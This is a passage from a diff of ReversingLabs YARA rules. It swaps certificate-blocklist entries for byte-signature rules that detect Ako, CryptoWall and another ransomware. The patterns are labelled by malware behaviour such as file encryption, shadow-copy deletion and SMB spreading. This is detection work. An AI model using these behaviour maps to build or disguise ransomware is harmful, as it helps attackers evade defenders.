+            ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ??
+            ?? 50 6A ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 33 FF 39 BD ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 0F 1F 40 ?? 8B 85 ?? ??
+            ?? ?? 83 7C 06 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 34 06 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? FF 34 06 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF
+        }
+		$smb_spreading_v2_p2 = {
+            15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 47 83 C6 ?? 3B BD ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 83 EB ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 46 81 C3 ?? ?? ?? ?? 89 B5 ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? 3B 32 0F 8C ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD 33 C0 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Technical and Commercial Consulting Pvt. Ltd." and pe.signatures [ i ] . serial == "4b:f1:d6:8e:92:6e:2d:d8:96:60:08:c4:4f:95:ea:1c" and 1322092799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $network_enumeration_v1_p* ) ) and ( all of ( $delete_shadow_copies_v1_p* ) ) and ( all of ( $encrypt_files_v1_p* ) ) ) or ( ( $find_files_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( all of ( $smb_spreading_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_149C12083C145E28155510Cfc19Db0Fe : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ako ransomware."
 		author = "ReversingLabs"
-		id = "8d9b0b1c-df7c-560a-8d51-bc8738952457"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "fce98a6a-f7bd-52ee-a2b8-31b48f6134ca"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2898-L2914"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f616fc470e223d65ac4c984394a38d566265ab37829ff566012de0a1527396c2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Ako.yara#L1-L173"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8321a4ace66ae48e3a6896daf02c184fa7767fa6bd10cd83b322ad01698008cf"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ako"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_win64_p1 = {
+            44 89 4C 24 ?? 4C 89 44 24 ?? 48 89 54 24 ?? 48 89 4C 24 ?? 56 57 48 81 EC ?? ?? ??
+            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ??
+            48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ??
+            ?? 41 B9 ?? ?? ?? ?? 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 89 44 24 ?? 81 7C 24 ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
+            48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? 32
+            C0 E9 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24
+            ?? 45 33 C0 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 BA ?? ?? ?? ??
+            48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84
+            24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 C7 44 24 ?? ?? ?? ??
+            ?? EB ?? 48 8B 44 24 ?? 48 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            39 44 24 ?? 0F 8D ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ??
+            4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 33 D2 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6
+        }
+		$encrypt_files_win64_p2 = {
+            44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 45 33 C9 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94
+            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ??
+            ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 0F B6 44 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? 05 ?? ??
+            ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 48 03 C1 48 89 44 24 ?? 33 D2 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B F8 48 8B 44 24 ?? 48 8B F0 B9 ?? ?? ?? ?? F3 A4 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? 4C 8B C8 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 0F B6 C0 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B 44 24 ??
+            48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F
+            B6 44 24 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? E9 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
+        }
+		$encrypt_files_win64_p3 = {
+            48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B
+            F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 41 B9 ?? ?? ??
+            ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B C8 E8
+            ?? ?? ?? ?? 90 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90
+            48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 24 ?? 44 8B C1 48 8B D0 48 8B 8C
+            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 48 89 44 24
+            ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 3B C8 0F
+            85 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 41
+            B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90
+            85 C0 74 ?? 8B 44 24 ?? 48 83 F8 ?? 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? C6 44
+            24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 0F B6 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4
+            ?? ?? ?? ?? 5F 5E C3
+        }
+		$encrypt_network_shares_win64_p1 = {
+            48 89 54 24 ?? 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 84 24 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 8B C8 E8
+            ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
+            8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83
+            C0 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C
+            8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 84 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B
+        }
+		$encrypt_network_shares_win64_p2 = {
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ??
+            ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ??
+            ?? 48 C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? 48 FF C0 48 89 44 24 ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 39 44 24 ?? 73 ?? 48 83 7C 24 ?? ?? 76 ?? 33 D2
+            48 8B 44 24 ?? B9 ?? ?? ?? ?? 48 F7 F1 48 8B C2 48 85 C0 75 ?? 41 B9 ?? ?? ?? ?? 4C
+        }
+		$encrypt_network_shares_win64_p3 = {
+            8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44
+            24 ?? 48 FF C0 48 89 44 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B
+            C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 C6 44 24 ?? ?? 48 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 32 C0 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$find_files_win64 = {
+            48 89 5C 24 ?? 55 56 57 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33
+            C4 48 89 84 24 ?? ?? ?? ?? 4D 8B F0 49 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B E9 48 3B D1
+            74 ?? 0F B7 02 66 83 E8 ?? 66 83 F8 ?? 77 ?? 0F B7 C0 49 0F A3 C0 72 ?? 48 83 EA ??
+            48 3B D5 75 ?? 0F B7 0A 66 83 F9 ?? 75 ?? 48 8D 45 ?? 48 3B D0 74 ?? 4D 8B CE 45 33
+            C0 33 D2 48 8B CD E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 83 E9 ?? 33 FF 66 83 F9 ?? 77 ??
+            0F B7 C1 49 0F A3 C0 B0 ?? 72 ?? 40 8A C7 48 2B D5 48 8D 4C 24 ?? 48 D1 FA 41 B8 ??
+            ?? ?? ?? 48 FF C2 F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 ?? ?? ?? ?? 45 33 C9 89 7C 24 ??
+            4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CD FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ??
+            75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CD E8 ?? ?? ?? ?? 8B F8 48 83 FB ?? 74 ?? 48 8B
+            CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F 5E 5D C3 49 8B 76 ?? 49 2B 36 48
+            C1 FE ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 7C 24 ?? 74 ?? 66 83 7C 24 ?? ?? 75 ?? 66 39
+            7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D5 E8 ?? ?? ?? ?? 85 C0 75 ??
+            48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 49 8B 56 ?? 48 2B D0
+            48 C1 FA ?? 48 3B F2 0F 84 ?? ?? ?? ?? 48 2B D6 48 8D 0C F0 4C 8D 0D ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3rd Eye Solutions Ltd" and pe.signatures [ i ] . serial == "14:9c:12:08:3c:14:5e:28:15:55:10:cf:c1:9d:b0:fe" and 1209340799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files_win64 ) and ( all of ( $encrypt_files_win64_p* ) ) and ( all of ( $encrypt_network_shares_win64_p* ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_77E0117E8B2B8Faa84Bed961019D5Ef8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptowall : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoWall ransomware."
 		author = "ReversingLabs"
-		id = "2733cc5b-bc1f-5ba9-a2f4-50f472fc288e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "06d8b106-d69a-526a-8e16-c95d39eb2993"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2916-L2932"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bea94b9da8c176f22a66fe7a4545dcc3a38f727a75a0bc7920d9aece8e24b9b7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.CryptoWall.yara#L3-L312"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "74baa04ee506732e0bb64a77cfd2d2216fcc978f13447ef07862e0116c093c14"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoWall"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$v30_entrypoint = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 9A 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 7E C7 45 ?? ?? ?? ?? ??
+            8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2
+            E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
+        }
+		$v20_entrypoint = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 A3 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 83 00 00 00 C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 6A 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ??
+            ?? ?? FF D2 E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
+        }
+		$v30_api_load = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 50 01 00 00 8B 45 ?? 50 E8 ?? ??
